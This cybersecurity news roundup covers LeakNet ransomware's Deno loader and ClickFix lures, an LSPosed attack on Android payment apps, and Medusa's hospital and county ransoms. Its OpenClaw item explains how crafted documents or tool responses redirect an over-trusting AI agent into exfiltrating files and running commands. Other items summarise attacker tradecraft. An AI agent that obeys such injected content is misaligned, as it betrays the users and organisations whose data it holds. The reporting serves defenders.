LeakNet Ransomware Uses ClickFix and Deno Runtime for Stealthy Attacks
ReliaQuest researchers have documented a significant tactical evolution by the LeakNet ransomware operation — a group active since late 2024 that averages roughly three victims per month — which has adopted ClickFix social engineering lures for initial access and now deploys a loader built on the legitimate open-source Deno JavaScript runtime to execute malicious payloads directly in memory, leaving minimal forensic evidence on disk and appearing to endpoint security tools as normal developer activity. The Deno-based loader is invoked through Visual Basic Script and PowerShell files deliberately named Romeo*.ps1 and Juliet*.vbs, and once it executes it fingerprints the host, generates a unique victim ID, connects to C2 infrastructure, and establishes a persistent polling loop for new commands — while post-exploitation tradecraft includes DLL sideloading via a Java binary in C:\ProgramData\USOShared, credential discovery via klist Kerberos ticket enumeration, lateral movement through PsExec, and data exfiltration staged to Amazon S3. ReliaQuest noted that LeakNet’s adoption of ClickFix mirrors recent moves by Termite and Interlock, suggesting ClickFix is now a mainstream ransomware access technique rather than an experimental one — and defenders can watch for specific detection triggers including Deno running outside development environments, suspicious “misexec” execution from browsers, abnormal PsExec usage, and unexpected outbound S3 traffic. (Note: BleepingComputer blocks automated fetches but is fully accessible in-browser.)
Android OS-Level Attack Bypasses Mobile Payment Security
CloudSEK researchers have disclosed an attack technique that uses the LSPosed framework — an Xposed-based module system widely used in rooted Android devices — to intercept and manipulate communications between legitimate payment applications and the operating system at runtime, bypassing SIM-binding authentication, spoofing device identities, and extracting 2FA SMS messages in real time without modifying a single line of the targeted app’s code and while leaving app signatures intact and Google Play Protect untriggered. Central to the attack is a module called “Digital Lutera” that exploits standard Android APIs to hook into system-level processes, exploiting SIM-binding’s fundamental design assumption that the physical SIM in the device is controlled by the legitimate user — an assumption that breaks entirely when OS-level code is compromised. CloudSEK warned that the technique is particularly difficult to detect because it operates below the application layer where most mobile security tools focus, and recommended that financial institutions layer behavioral analytics, transaction anomaly detection, and device attestation beyond certificate pinning or Play Integrity checks to catch attacks that bypass the application entirely.
Medusa Ransomware Gang Claims Attacks on Prominent Mississippi Hospital, New Jersey County
The Russia-assessed Medusa ransomware operation has formally claimed responsibility for the late-February cyberattack on the University of Mississippi Medical Center — the state’s only children’s hospital, only Level I trauma center, only Level IV neonatal intensive care unit, and sole organ transplant provider — which knocked all systems offline for nine days and forced clinical staff across oncology, radiology, and inpatient units to revert entirely to analog operations, demanding $800,000 and threatening to publish exfiltrated data by March 20 if unpaid. In a separate simultaneous claim, Medusa listed Passaic County, New Jersey as a victim and demanded an identical $800,000 ransom, adding to a growing 2026 tally of dozens of county and city governments hit by ransomware nationwide — a deliberate refocusing by Medusa and peer operations away from large metropolitan areas, which have attracted heavy federal scrutiny, toward smaller municipalities and mid-sized health systems assessed as having limited IR capability and higher pressure to pay. The FBI has previously warned that Medusa has engaged in “triple extortion” schemes in which a second actor — posing as a separate ransomware group — demands additional payment after the victim has already paid the original ransom, claiming the first payment was stolen and a new decryptor is needed.
OpenClaw AI Agent Flaws Could Enable Prompt Injection and Data Exfiltration
China’s national cybersecurity authority CNCERT has published an advisory warning that OpenClaw — a widely deployed open-source AI agent framework used by Chinese government ministries, state-owned enterprises, and dozens of private sector firms — contains multiple critical security flaws that could allow prompt injection attacks and unauthorized data exfiltration, and has restricted its use on government systems pending patches. The flaws, discovered by Tsinghua University researchers, stem from OpenClaw’s default trust model which treats all tool outputs and external data sources as equally trustworthy as user instructions, meaning maliciously crafted documents, web pages, or API responses can silently redirect the agent’s behavior — enabling attackers to exfiltrate sensitive files, execute arbitrary system commands, or pivot to other services the agent has access to without any user interaction. The disclosure is significant both for its subject matter — a government authority publicly warning about security flaws in a domestic AI product — and for its downstream implications for Western security teams, since OpenClaw has been adopted in several international research collaborations and its architecture mirrors assumptions baked into many Western AI agent frameworks that have not yet undergone equivalent scrutiny.
Trump Administration Isn’t Pushing Companies to Conduct Cyber Offense, National Cyber Director Says
National Cyber Director Sean Cairncross sought to clarify language in the recently released Trump national cyber strategy at an Auburn University McCrary Institute event Tuesday, drawing a sharp distinction between the document’s call to “incentivize companies to disrupt adversary networks” and any expectation that private sector firms would conduct offensive cyber campaigns — insisting the administration’s intent is for industry to share threat intelligence and illuminate the battlefield so that the U.S. government can conduct the actual offensive operations. Cairncross described the vision as a “spear from the United States government” backed by private sector intelligence, referencing the FBI’s “joint sequenced operations” model — in which private threat intelligence triggers coordinated government arrests, sanctions, and infrastructure takedowns — as the template the strategy is meant to scale. The clarification was notable given that cybersecurity lawyers and former government officials had flagged the strategy’s offensive language as legally ambiguous and potentially inviting firms to believe they had implicit government backing for “hack-back” operations, which remain illegal under the Computer Fraud and Abuse Act absent explicit authorization.
